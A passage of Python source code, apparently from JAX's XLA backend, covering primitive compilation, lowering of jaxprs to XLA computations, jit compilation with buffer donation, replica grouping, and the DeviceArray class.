msg = "primitive arguments must be colocated on the same device, got {}"
raise ValueError(msg.format(", ".join(map(str, devices)))) from err
@cache()
def primitive_computation(prim, axis_env, backend, tuple_args, *avals, **params):
c = xb.make_computation_builder(f"primitive_computation_{prim.name}")
op_metadata = make_op_metadata(prim, params)
c.set_op_metadata(op_metadata)
platform = xb.get_backend(backend).platform
xla_args, _ = _xla_callable_args(c, avals, tuple_args)
# return val always set as a side-effect on c
if prim in backend_specific_translations[platform]:
rule = backend_specific_translations[platform][prim]
ans = rule(c, *xla_args, **params)
elif prim in translations:
rule = translations[prim]
ans = rule(c, *xla_args, **params)
elif prim in translations_with_avals:
rule = translations_with_avals[prim]
ans = rule(c, avals, xla_args, params)
elif prim in initial_style_translations:
rule = initial_style_translations[prim]
ans = rule(c, axis_env, extend_name_stack(prim.name), avals, backend,
*xla_args, **params)
else:
raise NotImplementedError(f"XLA translation rule for {prim!r} on platform {platform!r} not found")
assert isinstance(ans, xe.XlaOp)
c.clear_op_metadata()
try:
return c.build(ans)
except RuntimeError as e:
msg = (" ".join(map(str, e.args)) + "\n"
"This is a bug in JAX's shape-checking rules; please report it!\n"
"https://github.com/google/jax/issues\n")
raise RuntimeError(msg) from e
def primitive_subcomputation(prim, *avals, **params):
axis_env = AxisEnv(1, (), ())
return primitive_computation(prim, axis_env, None, False, *avals, **params)
def backend_compile(backend, built_c, options):
# we use a separate function call to ensure that XLA compilation appears
# separately in Python profiling results
return backend.compile(built_c, compile_options=options)
def _execute_compiled_primitive(prim, compiled, result_handler, *args):
device, = compiled.local_devices()
input_bufs = list(it.chain.from_iterable(device_put(x, device) for x in args if x is not token))
out_bufs = compiled.execute(input_bufs)
check_special(prim.name, out_bufs)
return result_handler(*out_bufs)
def _execute_replicated_primitive(prim, compiled, result_handler, *args):
input_bufs = [
list(it.chain.from_iterable(device_put(x, device) for x in args if x is not token))
for device in compiled.local_devices()]
out_bufs = [
buf[0] for buf in compiled.execute_sharded_on_local_devices(
list(zip(*input_bufs)))
]
return result_handler(*out_bufs)
def needs_check_special():
return config.jax_debug_infs or config.jax_debug_nans
def check_special(name, bufs):
if needs_check_special():
for buf in bufs:
_check_special(name, buf.xla_shape(), buf)
def _check_special(name, xla_shape, buf):
assert not xla_shape.is_tuple()
if dtypes.issubdtype(xla_shape.element_type(), np.inexact):
if config.jax_debug_nans and np.any(np.isnan(buf.to_py())):
raise FloatingPointError(f"invalid value (nan) encountered in {name}")
if config.jax_debug_infs and np.any(np.isinf(buf.to_py())):
raise FloatingPointError(f"invalid value (inf) encountered in {name}")
### compiling jaxprs
def prefetch(x):
if isinstance(x, DeviceArray):
x.copy_to_host_async()
return x
def jaxpr_literals(jaxpr):
"""Generates all the literals inside a jaxpr, including nested subjaxprs."""
for eqn in jaxpr.eqns:
for v in eqn.invars:
if type(v) is core.Literal:
yield v.val
for subjaxpr in core.subjaxprs(jaxpr):
yield from jaxpr_literals(subjaxpr)
def _flatmap(func: Callable, vars: Sequence):
return list(it.chain.from_iterable(map(func, vars)))
def _partitionmap(func: Callable, vars: Sequence, nodes: Sequence):
return map(func, vars, _partition_outputs([v.aval for v in vars], nodes))
def jaxpr_subcomp(c, jaxpr, backend, axis_env, consts, name_stack, *args):
if backend not in ('cpu', 'gpu', 'tpu'):
platform = xb.get_backend(backend).platform # canonicalize
else:
platform = backend
def read(v):
if type(v) is Literal:
return xb.constant_general(c, canonicalize_dtype(v.val))
else:
return env[v]
def aval(v):
if type(v) is Literal:
return abstractify(v.val)
else:
return v.aval
def write(v, node):
assert node is not None
env[v] = node
env = {}
_partitionmap(write, [core.unitvar], _make_unit_constant(c))
_partitionmap(write, jaxpr.constvars, consts)
_partitionmap(write, jaxpr.invars, args)
for eqn in jaxpr.eqns:
op_metadata = make_op_metadata(
eqn.primitive, eqn.params, name_stack=name_stack,
source_info=eqn.source_info)
c.set_op_metadata(op_metadata)
in_nodes = _flatmap(read, eqn.invars)
# TODO(jakevdp): migrate `translations` table to `translations_with_avals`
if eqn.primitive in backend_specific_translations[platform]:
rule = backend_specific_translations[platform][eqn.primitive]
ans = rule(c, *in_nodes, **eqn.params)
elif eqn.primitive in translations:
ans = translations[eqn.primitive](c, *in_nodes, **eqn.params)
elif eqn.primitive in translations_with_avals:
rule = translations_with_avals[eqn.primitive]
ans = rule(c, map(aval, eqn.invars), in_nodes, eqn.params)
elif eqn.primitive in initial_style_translations:
new_params = check_backend_params(eqn.params, backend)
rule = initial_style_translations[eqn.primitive]
ans = rule(c, axis_env, extend_name_stack(name_stack, eqn.primitive.name),
map(aval, eqn.invars), backend, *in_nodes, **new_params)
elif eqn.primitive in parallel_translations:
rule = parallel_translations[eqn.primitive]
ans = rule(c, *in_nodes, axis_env=axis_env, platform=platform, **eqn.params)
elif eqn.primitive in call_translations:
new_params = check_backend_params(eqn.params, backend)
rule = call_translations[eqn.primitive]
ans = rule(c, axis_env, in_nodes,
name_stack, backend=backend, **new_params)
else:
raise NotImplementedError(
f"XLA translation rule for primitive '{eqn.primitive.name}' not found")
assert isinstance(ans, xe.XlaOp)
c.get_shape(ans) # force xla to do shape error checking
if eqn.primitive.multiple_results or any(v.aval._num_buffers > 1 for v in eqn.outvars):
out_nodes = xla_destructure(c, ans)
else:
out_nodes = [ans]
c.clear_op_metadata()
_partitionmap(write, eqn.outvars, out_nodes)
return _flatmap(read, jaxpr.outvars)
def xla_destructure(c, ans):
num_elements = len(c.get_shape(ans).tuple_shapes())
return [xops.GetTupleElement(ans, i) for i in range(num_elements)]
def check_backend_params(params, outer_backend):
# For nested calls, the outermost call sets the backend for all inner calls;
# it's an error if the inner call has a conflicting explicit backend spec.
inner_backend = params.get('backend', None)
if inner_backend and inner_backend != outer_backend:
raise ValueError(
f"Outer-jit backend specification {outer_backend} must match explicit "
f"inner-jit backend specification {inner_backend}.")
return {k: params[k] for k in params if k != 'backend'}
class AxisEnv(NamedTuple):
"""Represents a pmap mesh (only along the replica axes)."""
nreps: int
names: Tuple[Any, ...]
sizes: Tuple[int, ...]
def extend_axis_env(env: AxisEnv, name, size: int):
return AxisEnv(env.nreps, env.names + (name,), env.sizes + (size,))
def axis_read(axis_env, axis_name):
try:
return max(i for i, name in enumerate(axis_env.names) if name == axis_name)
except ValueError:
raise NameError("unbound axis name: {}".format(axis_name)) from None
def axis_groups(axis_env: AxisEnv, name):
if not isinstance(name, (list, tuple)):
name = (name,)
mesh_axes = tuple(unsafe_map(partial(axis_read, axis_env), name))
trailing_size, ragged = divmod(axis_env.nreps, prod(axis_env.sizes))
assert not ragged
mesh_spec = axis_env.sizes + (trailing_size,)
return _axis_groups(mesh_spec, mesh_axes)
def _axis_groups(mesh_spec, mesh_axes):
"""Computes replica group ids for a collective performed over a subset of the mesh.
Args:
mesh_spec: A sequence of integers representing the mesh shape.
mesh_axes: A sequence of integers between 0 and `len(mesh_spec)` (exclusive)
indicating over which axes the collective is performed.
Returns:
A tuple of replica groups (i.e. tuples containing replica ids).
"""
iota = np.arange(prod(mesh_spec)).reshape(mesh_spec)
groups = np.reshape(
np.moveaxis(iota, mesh_axes, np.arange(len(mesh_axes))),
(prod(np.take(mesh_spec, mesh_axes)), -1))
return tuple(unsafe_map(tuple, groups.T))
def jaxpr_replicas(jaxpr) -> int:
"""The number of replicas needed for a jaxpr.
For a eqn, multiply the `axis_size` with the `jaxpr_replicas` of the
subjaxprs. For a list of eqns, take the maximum number of replicas.
"""
if isinstance(jaxpr, core.ClosedJaxpr):
jaxpr = jaxpr.jaxpr
return max(unsafe_map(eqn_replicas, jaxpr.eqns), default=1)
# TODO(mattjj): this function assumes that only pmap has a parameter named
# axis_size, and that it corresponds to cross-replica mapping
def eqn_replicas(eqn):
call_jaxpr = eqn.params.get("call_jaxpr")
if call_jaxpr:
return eqn.params.get('axis_size', 1) * jaxpr_replicas(call_jaxpr)
elif eqn.primitive in initial_style_translations:
return initial_style_primitive_replicas(eqn.params)
else:
return 1
def initial_style_primitive_replicas(params):
return max(core.traverse_jaxpr_params(jaxpr_replicas, params).values(), default=1)
# TODO(mattjj,skyewm): the functions here are utilities for checking if
# not-yet-supported features are used with multi-host programming
def jaxpr_has_pmap(jaxpr):
"""Whether there is an xla_pmap primitive anywhere inside a Jaxpr."""
for eqn in jaxpr.eqns:
if 'xla_pmap' in eqn.primitive.name:
return True
for subjaxpr in core.subjaxprs(jaxpr):
if jaxpr_has_pmap(subjaxpr):
return True
return False
def jaxpr_collectives(jaxpr):
"""Generates all the collective primitives anywhere inside a Jaxpr."""
for eqn in jaxpr.eqns:
if eqn.primitive in parallel_translations:
yield eqn.primitive
for subjaxpr in core.subjaxprs(jaxpr):
yield from jaxpr_collectives(subjaxpr)
### xla_call underlying jit
def _xla_call_impl(fun: lu.WrappedFun, *args, device, backend, name,
donated_invars, inline):
del inline # Only used at tracing time
compiled_fun = _xla_callable(fun, device, backend, name, donated_invars,
*unsafe_map(arg_spec, args))
try:
return compiled_fun(*args)
except FloatingPointError:
assert config.jax_debug_nans or config.jax_debug_infs # compiled_fun can only raise in this case
print("Invalid value encountered in the output of a jit function. "
"Calling the de-optimized version.")
# We want to run the wrapped function again (after _xla_callable already ran
# it), but linear_util.WrappedFun instances are meant to be run only once.
# In addition to re-executing the Python code, which is usually undesirable
# but which config.jax_debug_nans is meant to opt into, we'll be re-executing
# any linear_util.py-style side effects, i.e. re-populating Stores created
# by any transformation_with_aux's applied to fun. Since this is
# intentional here, to avoid "Store occupied" errors we reset the stores to
# be empty.
for store in fun.stores: store and store.reset()
with core.new_sublevel():
return fun.call_wrapped(*args) # probably won't return
def flatten_shape(s: XlaShape) -> Sequence[Tuple[Sequence[int], XlaShape]]:
"""Expands a given shape tree into a flat list of indices to arrays.
Given the following computation:
>>> c = xc.XlaBuilder("example")
>>> p0 = xb.parameter(c, 1, xc.shape_from_pyval(jnp.ones([1])))
>>> p1 = xb.parameter(c, 2, xc.shape_from_pyval(jnp.ones([2])))
>>> p2 = xb.parameter(c, 3, xc.shape_from_pyval(jnp.ones([3])))
>>> o = xops.Tuple(c, [p0, p1, p2])
We can query the arrays in the output tuple:
>>> flatten_shape(c.GetShape(o))
[((0,), f32[1]{0}), ((1,), f32[2]{0}), ((2,), f32[3]{0})]
Or the arrays in one of the parameters (which is itself an array):
>>> flatten_shape(c.GetShape(p0))
[((), f32[1]{0})]
Args
s: The input shape.
Returns:
An iterable of pairs of indices and shapes for each array within the shape
tree.
"""
results: List[Tuple[Tuple[int, ...], XlaShape]] = []
_flatten_shape(s, (), results)
return results
def _flatten_shape(s: XlaShape, index: Tuple[int, ...],
results: List[Tuple[Tuple[int, ...], XlaShape]]) -> None:
if s.is_array() or s.is_token():
results.append((index, s))
else:
assert s.is_tuple()
for i, sub in enumerate(s.tuple_shapes()):
_flatten_shape(sub, index + (i,), results)
def _xla_consts(c, consts):
unique_consts = {id(const): const for const in consts}
xla_consts = {
id_: xb.constant_general(c, const) for id_, const in unique_consts.items()}
return [c for const in consts for c in xla_consts[id(const)]]
@lu.cache
def _xla_callable(fun: lu.WrappedFun, device, backend, name, donated_invars, *arg_specs):
if device is not None and backend is not None:
raise ValueError("can't specify both a device and a backend for jit, "
"got device={} and backend={}".format(device, backend))
abstract_args, arg_devices = unzip2(arg_specs)
jaxpr, out_avals, consts = pe.trace_to_jaxpr_final(
fun, abstract_args, pe.debug_info_final(fun, "jit"))
if any(isinstance(c, core.Tracer) for c in consts):
raise UnexpectedTracerError("Encountered an unexpected tracer.")
jaxpr, kept_const_idx, kept_var_idx = _prune_unused_inputs(jaxpr)
consts = [c for i, c in enumerate(consts) if i in kept_const_idx]
pruned_arg_specs = (a for i, a in enumerate(arg_specs) if i in kept_var_idx)
abstract_args, arg_devices = unzip2(pruned_arg_specs)
donated_invars = [
x for i, x in enumerate(donated_invars) if i in kept_var_idx
]
map(prefetch, it.chain(consts, jaxpr_literals(jaxpr)))
jaxpr = apply_outfeed_rewriter(jaxpr)
nreps = jaxpr_replicas(jaxpr)
device = _xla_callable_device(nreps, backend, device, arg_devices)
backend = xb.get_device_backend(device) if device else (
xb.get_backend(backend) if backend is not None else None)
result_handlers = map(partial(aval_to_result_handler, device), out_avals)
# Computations that only produce constants and/or only rearrange their inputs,
# which are often produced from partial evaluation, don't need compilation,
# and don't need to evaluate their arguments.
if not jaxpr.eqns:
return partial(_execute_trivial, jaxpr, device, consts, out_avals,
result_handlers, kept_var_idx)
if not _on_exit:
log_priority = logging.WARNING if config.jax_log_compiles else logging.DEBUG
logging.log(log_priority, "Compiling %s (%s) for args %s.",
fun.__name__, id(fun), abstract_args)
if nreps > 1:
warn(f"The jitted function {fun.__name__} includes a pmap. Using "
"jit-of-pmap can lead to inefficient data movement, as the outer jit "
"does not preserve sharded data representations and instead collects "
"input and output arrays onto a single device. "
"Consider removing the outer jit unless you know what you're doing. "
"See https://github.com/google/jax/issues/2926.")
if nreps > xb.device_count(backend):
raise ValueError(
f"compiling computation that requires {nreps} replicas, but only "
f"{xb.device_count(backend)} XLA devices are available")
if xb.process_count() > 1 and (nreps > 1 or jaxpr_has_pmap(jaxpr)):
raise NotImplementedError(
"jit of multi-host pmap not implemented (and jit-of-pmap can cause "
"extra data movement anyway, so maybe you don't want it after all).")
tuple_args = len(abstract_args) > 100 # pass long arg lists as tuple for TPU
c = xb.make_computation_builder("jit_{}".format(fun.__name__))
xla_consts = _xla_consts(c, consts)
xla_args, donated_invars = _xla_callable_args(c, abstract_args, tuple_args,
donated_invars=donated_invars)
out_nodes = jaxpr_subcomp(
c, jaxpr, backend.platform if backend is not None else None,
AxisEnv(nreps, (), ()), xla_consts,
extend_name_stack(wrap_name(name, 'jit')), *xla_args)
backend = xb.get_backend(backend)
out_tuple = xops.Tuple(c, out_nodes)
if backend.platform in ("gpu", "tpu"):
donated_invars = set_up_aliases(c, xla_args, out_tuple, donated_invars, tuple_args)
if any(donated_invars):
# TODO(tomhennigan): At call time we should mark these buffers as deleted.
unused_donations = [str(c.GetShape(a))
for a, d in zip(xla_args, donated_invars) if d]
warn("Some donated buffers were not usable: {}".format(", ".join(unused_donations)))
built = c.build(out_tuple)
options = xb.get_compile_options(
num_replicas=nreps,
num_partitions=1,
device_assignment=(device.id,) if device else None)
options.parameter_is_tupled_arguments = tuple_args
compiled = compile_or_get_cached(backend, built, options)
if nreps == 1:
return partial(_execute_compiled, compiled, out_avals, result_handlers,
kept_var_idx)
else:
return partial(_execute_replicated, compiled, out_avals, result_handlers,
kept_var_idx)
def set_up_aliases(c, xla_args, out_tuple, donated_args, tuple_args):
"""Configures input/output "must" aliasing based on `donated_args`."""
# First for every input array add it to `donations` iff it is a member of
# `donated_args`.
donations = defaultdict(deque)
for arg_index, arg in enumerate(xla_args):
if donated_args[arg_index]:
for param_index, element in flatten_shape(c.GetShape(arg)):
key = (element.dimensions(), element.xla_element_type())
if tuple_args:
param_number = 0
param_index = (arg_index,) + tuple(param_index)
donations[key].append((param_number, param_index, arg_index))
else:
param_number = arg_index
donations[key].append((param_number, param_index, arg_index))
# Consume donations for outputs.
out_donated_args = list(donated_args)
for output_index, element in flatten_shape(c.GetShape(out_tuple)):
key = (element.dimensions(), element.xla_element_type())
if donations.get(key, ()):
param_number, param_index, arg_index = donations[key].popleft()
out_donated_args[arg_index] = False
c.setup_alias(output_index, param_number, param_index)
return tuple(out_donated_args)
def _prune_unused_inputs(
jaxpr: core.Jaxpr) -> Tuple[core.Jaxpr, Set[int], Set[int]]:
used = {v for v in jaxpr.outvars if isinstance(v, core.Var)}
# TODO(zhangqiaorjc): Improve the DCE algorithm by also pruning primitive
# applications that do not produce used outputs. Must handle side-effecting
# primitives and nested jaxpr.
used.update(
v for eqn in jaxpr.eqns for v in eqn.invars if isinstance(v, core.Var))
kept_const_idx, new_constvars = unzip2(
(i, v) for i, v in enumerate(jaxpr.constvars) if v in used)
kept_var_idx, new_invars = unzip2(
(i, v) for i, v in enumerate(jaxpr.invars) if v in used)
new_jaxpr = core.Jaxpr(new_constvars, new_invars, jaxpr.outvars, jaxpr.eqns)
return new_jaxpr, set(kept_const_idx), set(kept_var_idx)
def _xla_callable_device(nreps, backend, device, arg_devices):
if nreps > 1:
if device is not None or backend is not None:
raise ValueError(f"can't specify device or backend for jit-of-pmap, "
f"got device={device} and backend={backend}")
return None
else:
if device is None and backend is None:
return _device_from_arg_devices(arg_devices)
elif device is not None and backend is None:
return device
elif device is None and backend is not None:
return xb.get_backend(backend).get_default_device_assignment(1)[0]
else:
assert False # Unreachable given the error check in _xla_callable
# Used within _xla_callable_args and _xla_param to distinguish between None (no
# sharding annotation set) and replicated.
_replicated_param = object()
def _xla_callable_args(
c, avals, tuple_args, *,
replicated=None,
partitions=None,
partitions_proto: bool = False,
donated_invars=None):
assert partitions is None or len(partitions) == len(avals)
if not tuple_args:
if replicated is None:
replicated = [None] * len(avals)
if partitions is None:
parts: List[object] = [None] * len(avals)
elif partitions_proto:
parts = partitions
else:
parts = [_replicated_param if part is None else part
for part in partitions]
counts = it.count()
xla_args = [_xla_param(c, next(counts), xla_shape, r, p, partitions_proto)
if a is not abstract_token else xops.CreateToken(c)
for (a, r, p) in safe_zip(avals, replicated, parts)
for xla_shape in aval_to_xla_shapes(a)]
if donated_invars is not None:
donated_invars = [
d for (a, _, _, d) in zip(avals, replicated, parts, donated_invars)
for xla_shape in aval_to_xla_shapes(a)]
return xla_args, donated_invars
else:
if replicated is not None:
replicated = [r for a, r in zip(avals, replicated)
if a is not abstract_token]
if partitions is None:
tuple_parts = None
elif partitions_proto:
tuple_parts = xb.tuple_sharding_proto(partitions)
else:
tuple_parts = tuple(partitions)
tuple_shape = xc.Shape.tuple_shape(
[shape for a in avals for shape in aval_to_xla_shapes(a) if a is not abstract_token])
tuple_param = _xla_param(c, 0, tuple_shape, replicated, tuple_parts, partitions_proto)
xla_inputs = iter(xla_destructure(c, tuple_param))
xla_args = [next(xla_inputs) if a is not abstract_token else
xops.CreateToken(c) for a in avals]
assert next(xla_inputs, None) is None
return xla_args, donated_invars
def _xla_param(builder, param_num, xla_shape, replicated, partitions, parts_proto):
make_param = partial(xb.parameter, builder, param_num, xla_shape,
replicated=replicated)
with_sharding = xb.with_sharding_proto if parts_proto else xb.with_sharding
if partitions is None:
return make_param()
elif partitions is _replicated_param:
return with_sharding(builder, None, make_param)
else:
return with_sharding(builder, partitions, make_param)
def _execute_compiled(compiled: XlaExecutable, avals, handlers, kept_var_idx,
*args):
device, = compiled.local_devices()
input_bufs = list(
it.chain.from_iterable(
device_put(x, device)
for i, x in enumerate(args)
if x is not token and i in kept_var_idx))
out_bufs = compiled.execute(input_bufs)
check_special(xla_call_p.name, out_bufs)
return [handler(*bs) for handler, bs in zip(handlers, _partition_outputs(avals, out_bufs))]
def _execute_replicated(compiled: XlaExecutable, avals, handlers, kept_var_idx,
*args):
input_bufs = [
list(
it.chain.from_iterable(
device_put(x, device)
for i, x in enumerate(args)
if x is not token and i in kept_var_idx))
for device in compiled.local_devices()
]
out_bufs = [
buf[0] for buf in compiled.execute_sharded_on_local_devices(
list(zip(*input_bufs)))
]
check_special(xla_call_p.name, out_bufs)
return [handler(*bs) for handler, bs in zip(handlers, _partition_outputs(avals, out_bufs))]
def _execute_trivial(jaxpr, device: Optional[Device], consts, avals, handlers,
kept_var_idx, *args):
env = {core.unitvar: core.unit}
pruned_args = (x for i, x in enumerate(args) if i in kept_var_idx)
map(env.setdefault, jaxpr.invars, pruned_args)
map(env.setdefault, jaxpr.constvars, consts)
outs = [canonicalize_dtype(v.val) if type(v) is Literal else env[v]
for v in jaxpr.outvars]
return [_copy_device_array_to_device(x, device) if type_is_device_array(x)
else h(*device_put(x, device)) for h, x in zip(handlers, outs)]
xla_call_p: core.CallPrimitive = core.CallPrimitive('xla_call')
xla_call = xla_call_p.bind
xla_call_p.def_impl(_xla_call_impl)
def _xla_call_partial_eval_update_params(params, in_unknowns):
call_jaxpr = params['call_jaxpr']
donated_invars = params['donated_invars']
if not in_unknowns and donated_invars:
# JaxprTrace.post_process_call creates a call with no input tracers
new_donated_invars = (False,) * len(call_jaxpr.invars)
else:
# JaxprTrace.process_call drops known input tracers
donated_invars = [d for d, uk in zip(donated_invars, in_unknowns) if uk]
new_donated_invars = ((False,) * (len(call_jaxpr.invars) - len(donated_invars))
+ tuple(donated_invars))
return dict(params, donated_invars=new_donated_invars)
pe.call_param_updaters[xla_call_p] = _xla_call_partial_eval_update_params
def _xla_call_jvp_update_params(params, nz_tangents, nz_tangents_out_thunk):
donated_invars = params['donated_invars']
donated_tangents = [d for d, nz in zip(donated_invars, nz_tangents) if nz]
new_donated_invars = (*donated_invars, *donated_tangents)
return dict(params, donated_invars=new_donated_invars)
ad.call_param_updaters[xla_call_p] = _xla_call_jvp_update_params
def _xla_call_transpose_update_params(params, undef_primals, nonzero_cts):
donated_invars = params['donated_invars']
donated_primals = [d for d, u in zip(donated_invars, undef_primals) if not u]
donated_cotangents = [False for nz in nonzero_cts if nz]
return dict(params, donated_invars=(*donated_primals, *donated_cotangents))
ad.call_transpose_param_updaters[xla_call_p] = _xla_call_transpose_update_params
def _xla_call_translation_rule(c, axis_env, in_nodes, name_stack, backend, name,
call_jaxpr, donated_invars, inline=None, device=None):
del device, donated_invars, inline # Ignored.
subc = xb.make_computation_builder(f"jit_{name}")
args = [xb.parameter(subc, i, c.get_shape(n)) for i, n in enumerate(in_nodes)]
out_nodes = jaxpr_subcomp(subc, call_jaxpr, backend, axis_env, (),
extend_name_stack(name_stack, wrap_name(name, 'jit')), *args)
subc = subc.build(xops.Tuple(subc, out_nodes))
return xops.Call(c, subc, list(in_nodes))
ad.primitive_transposes[xla_call_p] = partial(ad.call_transpose, xla_call_p)
### translation tables
translations: Dict[core.Primitive, Callable] = {}
translations_with_avals: Dict[core.Primitive, Callable] = {}
parallel_translations: Dict[core.Primitive, Callable] = {}
initial_style_translations: Dict[core.Primitive, Callable] = {}
call_translations: Dict[core.Primitive, Callable] = {}
backend_specific_translations: Dict[str, Dict[core.Primitive, Callable]] = defaultdict(dict)
call_translations[xla_call_p] = _xla_call_translation_rule
def zeros_like_translation_rule(c, x):
shape = c.get_shape(x)
assert not shape.is_tuple()
zero = xb.constant(c, np.array(0, shape.element_type()))
return xops.Broadcast(zero, shape.dimensions())
translations[ad_util.zeros_like_p] = zeros_like_translation_rule
def add_jaxvals_translation_rule(c, x, y):
shape = c.get_shape(x)
assert not shape.is_tuple()
return xops.Add(x, y)
translations[ad_util.add_jaxvals_p] = add_jaxvals_translation_rule
translations[ad_util.stop_gradient_p] = lambda c, x: x
@lu.transformation
def _tuple_output(*args, **kwargs):
ans = yield args, kwargs
yield (ans,)
def lower_fun(fun, multiple_results, parallel=False, with_avals=False, backend=None):
# TODO(jakevdp): migrate dependent code & always use the with_avals=True.
def f(c, *xla_args, **params):
avals = [_array_aval_from_xla_shape(c.get_shape(x)) for x in xla_args]
return f_with_avals(c, avals, xla_args, params)
def f_with_avals(c, avals, xla_args, params):
if parallel:
axis_env = params.pop('axis_env')
del params['platform']
else:
axis_env = AxisEnv(1, (), ())
wrapped_fun = lu.wrap_init(fun, params)
if not multiple_results:
wrapped_fun = _tuple_output(wrapped_fun)
with core.extend_axis_env_nd(zip(axis_env.names, axis_env.sizes)):
jaxpr, _, consts = pe.trace_to_jaxpr_dynamic(wrapped_fun, avals)
outs = jaxpr_subcomp(c, jaxpr, backend, axis_env, _xla_consts(c, consts), '',
*xla_args)
if multiple_results or any(v.aval._num_buffers > 1 for v in jaxpr.outvars):
return xops.Tuple(c, outs)
else:
assert len(outs) == 1, outs
return outs[0]
return f_with_avals if with_avals else f
def _array_aval_from_xla_shape(xla_shape):
# This function instantiates the assumption that we can map fro XLA array
# types to JAX array types.
# TODO(mattjj): remove assumption can map XLA array types to JAX array types
assert not xla_shape.is_tuple()
return ShapedArray(xla_shape.dimensions(), xla_shape.numpy_dtype())
def lower_fun_initial_style(fun):
def f(c, axis_env, name_stack, avals, backend, *xla_args, **params):
jaxpr, _, consts = pe.trace_to_jaxpr_dynamic(lu.wrap_init(fun, params), avals)
outs = jaxpr_subcomp(c, jaxpr, backend, axis_env, _xla_consts(c, consts),
name_stack, *xla_args)
return xops.Tuple(c, outs)
return f
### device-persistent data
class Token(object): pass
token = Token()
pytype_aval_mappings[Token] = lambda _: abstract_token
core.pytype_aval_mappings[Token] = lambda _: abstract_token
xla_shape_handlers[AbstractToken] = lambda _: (xc.Shape.token_shape(),)
xla_result_handlers[AbstractToken] = lambda _, __: lambda _: token
canonicalize_dtype_handlers[Token] = identity
device_put_handlers[Token] = lambda x, _: (x,)
def _forward_method(attrname, self, fun, *args):
return fun(getattr(self, attrname), *args)
_forward_to_value = partial(_forward_method, "_value")
# The following is used for the type _CppDeviceArray or _DeviceArray.
DeviceArrayProtocol = Any
DeviceArray = xc.DeviceArrayBase
_CppDeviceArray: DeviceArrayProtocol = xc.Buffer
def make_device_array(
aval: core.ShapedArray,
device: Optional[Device],
device_buffer: PyLocalBuffer,
) -> Union[PyLocalBuffer, "_DeviceArray"]:
"""Returns a DeviceArray implementation based on arguments.
This is to be used only within JAX. It will return either a PythonDeviceArray
or a C++ equivalent implementation.
"""
if (isinstance(device_buffer, _CppDeviceArray)):
if device_buffer.aval == aval and device_buffer._device == device:
return device_buffer
device_buffer = device_buffer.clone()
device_buffer._device = device
device_buffer.aval = aval
device_buffer.weak_type = aval.weak_type
return device_buffer
return _DeviceArray(aval, device, device_buffer)
def type_is_device_array(x):
"""Returns `True` if `x` is a non-sharded DeviceArray.
Use this function instead of `type(x) is Devicearray`.
"""
type_x = type(x)
return type_x is _DeviceArray or type_x is _CppDeviceArray
def device_array_supports_weakrefs():
try:
weakref.ref(DeviceArray())
return True
except TypeError:
return False
class _DeviceArray(DeviceArray): # type: ignore
"""A DeviceArray is an ndarray backed by a single device memory buffer."""
# We don't subclass ndarray because that would open up a host of issues,
# but lax_numpy.py overrides isinstance behavior and attaches ndarray methods.
__slots__ = [
"aval", "device_buffer", "_npy_value", "_device", "__weakref__"
]
__array_priority__ = 100
# DeviceArray has methods that are dynamically populated in lax_numpy.py,
# and this annotation is needed to make pytype happy.
_HAS_DYNAMIC_ATTRIBUTES = True
def __init__(self, aval: core.ShapedArray, device: Optional[Device],
device_buffer: PyLocalBuffer):
"""Initializer.
Args:
aval: The abstract value associated to this array (shape+dtype+weak_type).
device: The optional sticky device. See
https://jax.readthedocs.io/en/latest/faq.html#controlling-data-and-computation-placement-on-devices
device_buffer: The underlying buffer owning the on-device data.
"""
DeviceArray.__init__(self)
self.aval = aval
self.device_buffer = device_buffer
self._device = device
self._npy_value = None
if config.jax_enable_checks:
assert type(aval) is ShapedArray
npy_value = self._value
assert npy_value.dtype == aval.dtype and npy_value.shape == aval.shape
assert (device is None) or device is device_buffer.device()
def _check_if_deleted(self):
if self.device_buffer is deleted_buffer:
raise RuntimeError("DeviceArray has been deleted.")
def block_until_ready(self):
"""Blocks the caller until the buffer's value has been computed on device.
This method is mostly useful for timing microbenchmarks that wish to
time how long a computation takes, without transferring the result back
to the host.
Returns the buffer object (`self`).
"""
self._check_if_deleted()
self.device_buffer.block_host_until_ready() # pytype: disable=attribute-error
return self
@property
def _value(self):
self._check_if_deleted()
if self._npy_value is None:
self._npy_value = self.device_buffer.to_py()
self._npy_value.flags.writeable = False
return self._npy_value
@property
def shape(self):
return self.aval.shape
@property
def dtype(self):
return self.aval.dtype
@property
def size(self):
return prod(self.aval.shape)
@property
def ndim(self):
return len(self.aval.shape)
def copy_to_host_async(self):
"""Requests a copy of the buffer to the host."""
self._check_if_deleted()
if self._npy_value is None:
self.device_buffer.copy_to_host_async() # pytype: disable=attribute-error
def delete(self):
"""Deletes the device array and any cached copy on the host.
It is an error to access the contents of a `DeviceArray` after it has
been deleted.
Use of this method is optional; device buffers will be reclaimed
automatically by Python when a DeviceArray object is garbage collected.
However, it is sometimes useful to have more explicit control over the
time of deletion.
"""
self.device_buffer.delete() # pytype: disable=attribute-error
self.device_buffer = deleted_buffer
self._npy_value = None
@property
def __cuda_array_interface__(self):
return self.device_buffer.__cuda_array_interface__
# Adding methods dynamically to both _DeviceArray and _CppDeviceArray
# pylint: disable=protected-access
for device_array in [DeviceArray]:
def copy(self):
"""Returns an ndarray (backed by host memory, not device memory)."""
return np.asarray(self)
setattr(device_array, "copy", copy)
def __repr__(self):
line_width = np.get_printoptions()["linewidth"]
prefix = '{}('.format(self.__class__.__name__.lstrip('_'))
s = np.array2string(self._value, prefix=prefix, suffix=',',
separator=', ', max_line_width=line_width)
dtype_str = 'dtype={})'.format(self.dtype.name)
last_line_len = len(s) - s.rfind('\n') + 1
sep = ' '
if last_line_len + len(dtype_str) + 1 > line_width:
sep = ' ' * len(prefix)
return "{}{},{}{}".format(prefix, s, sep, dtype_str)
setattr(device_array, "__repr__", __repr__)
def item(self):
if dtypes.issubdtype(self.dtype, np.complexfloating):
return complex(self)
elif dtypes.issubdtype(self.dtype, np.floating):
return float(self)
elif dtypes.issubdtype(self.dtype, np.integer):
return int(self)
elif dtypes.issubdtype(self.dtype, np.bool_):
return bool(self)
else:
raise TypeError(self.dtype)
setattr(device_array, "item", item)
def __len__(self):
try:
return self.aval.shape[0]
except IndexError as err:
raise TypeError("len() of unsized object") from err # same as numpy error
setattr(device_array, "__len__", __len__)
def __iter__(self):
if self.ndim == 0:
raise TypeError("iteration over a 0-d array") # same as numpy error
else:
return self._value.__iter__()
setattr(device_array, "__iter__", __iter__)
def __reversed__(self):
if self.ndim == 0:
raise TypeError("iteration over a 0-d array")
else:
return reversed(self._value)
setattr(device_array, "__reversed__", __reversed__)
def __format__(self, format_spec):
# Simulates behavior of https://github.com/numpy/numpy/pull/9883
if self.ndim == 0:
